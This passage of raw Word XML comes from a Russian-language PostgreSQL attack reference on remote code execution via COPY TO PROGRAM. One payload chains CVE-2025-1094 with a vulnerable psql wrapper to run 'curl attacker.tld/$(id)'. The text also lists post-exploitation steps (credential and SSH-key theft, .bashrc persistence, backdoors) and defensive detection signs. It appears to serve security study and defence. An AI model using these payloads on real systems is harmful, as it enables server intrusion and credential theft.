        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># далее интерактивный shell, права — postgres</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — chain CVE-2025-1094 (R6) → COPY TO PROGRAM (R3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Production-сценарий, где приложение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не использует напрямую драйвер</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -c "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через subprocess, и пользовательский ввод проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libpq escape). CVE-2025-1094 ломает escape через invalid-UTF-8: специально сформированная байтовая последовательность остаётся в кавычках для escape-функции, но в psql интерпретируется как закрытие литерала.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый враппер:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># admin/backup.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from psycopg2.extensions import adapt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export_table(table: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    escaped = adapt(table).getquoted().decode()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    subprocess.run(["psql", "-h", DB_HOST, "-c",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    f"COPY {escaped} TO STDOUT WITH CSV"])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (упрощённо, реальный CVE-2025-1094 payload — invalid UTF-8 byte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\xC0</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users\xC0'; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(id)'; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После encoding-bypass в psql escape ломается, payload интерпретируется psql как:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY users; COPY (SELECT '') TO PROGRAM 'curl attacker.tld/$(id)'; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполнена с правами роли, под которой psql коннектится — если это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(как часто бывает в backup-скриптах), то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не нужен — это уже superuser. Детальный разбор CVE-2025-1094 — в 4.5 (Хронология 2025).</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В каждом из трёх payload — исполнение произвольной shell-команды на сервере PostgreSQL под OS-пользователем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(типично — UID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, домашняя директория </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/postgresql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, доступ к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$PGDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Из этой точки атакующий может: читать всю файловую систему, доступную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(включая SSH-ключи, креды в env); писать в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.bashrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для persistence; читать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и переписывать его (если права позволяют) для последующего trust-auth; коннектиться к internal services как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-host; запускать майнер/бэкдор.</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COPY ... FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — серверная фича, документированная функциональность PostgreSQL. Команда передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">popen("cmd", "r")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popen("cmd", "w")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> backend-процесса. Shell-интерпретация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&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) делается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который popen() использует по умолчанию. Никакой санитизации, никакого whitelisting — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">админская команда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, защита перенесена на уровень привилегий.</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COPY ... FROM/TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавлен в PG 9.3 (2013). Поведение стабильное.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до PG 10 — только superuser. С PG 11 — superuser ИЛИ predefined role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(см. 2.2). Practical: роли с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создают для backup/ETL-операторов — типичный production-setup.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 требуются, COPY встроен.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нет специальных требований.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ограничивает длительность запроса (рекомендуется), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY TO PROGRAM 'curl ...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполнится мгновенно — timeout его не остановит.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Дополнительно для Payload C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL ≤17.2 / ≤16.7 / ≤15.11 / ≤14.16 / ≤13.19 уязвимы к CVE-2025-1094 в psql-клиенте (см. 4.5).</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COPY ... TO PROGRAM 'gzip &gt; /backup/...'</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COPY ... FROM PROGRAM 'aws s3 cp s3://.../data.csv -'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backup и ETL. Признаки атаки в логах:</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'all'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'mod'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не от backup-оператора (имя роли). Application-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, выполняющая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY ... TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — чёткий маркер.</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нормализованные записи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY $1 TO PROGRAM $2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с источником из веб-сессии (по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или сетевому источнику).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HTTP-исходящий трафик от backend-хоста на нетипичные IP/домены — fingerprint для curl/wget/nc.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Команда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">popen()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от процесса postgres в audit-логах ядра (auditd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">execve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтр для UID postgres → /bin/sh).</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Поведение фичи стабильно с PG 9.3. Изменения только по привилегиям: до PG 11 — superuser-only; с PG 11 —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Никаких фиксов «отключающих» функциональность не планируется — это by design.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг как pre-flight для большинства COPY-инъекций (Payload A и B полагаются на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драйвере, который не блокирует multi-statement).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3.6.4 lo_export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернативный путь к RCE через web-shell или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trust + reload. Более стелс, более многошаговый.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3.7.2a plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива, требует superuser + CREATE EXTENSION. COPY PROGRAM не требует CREATE EXTENSION, поэтому быстрее.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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — получение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через цепочки (extension hijack, search_path, SECURITY DEFINER).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — детали CVE-2025-1094 (Payload C).</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
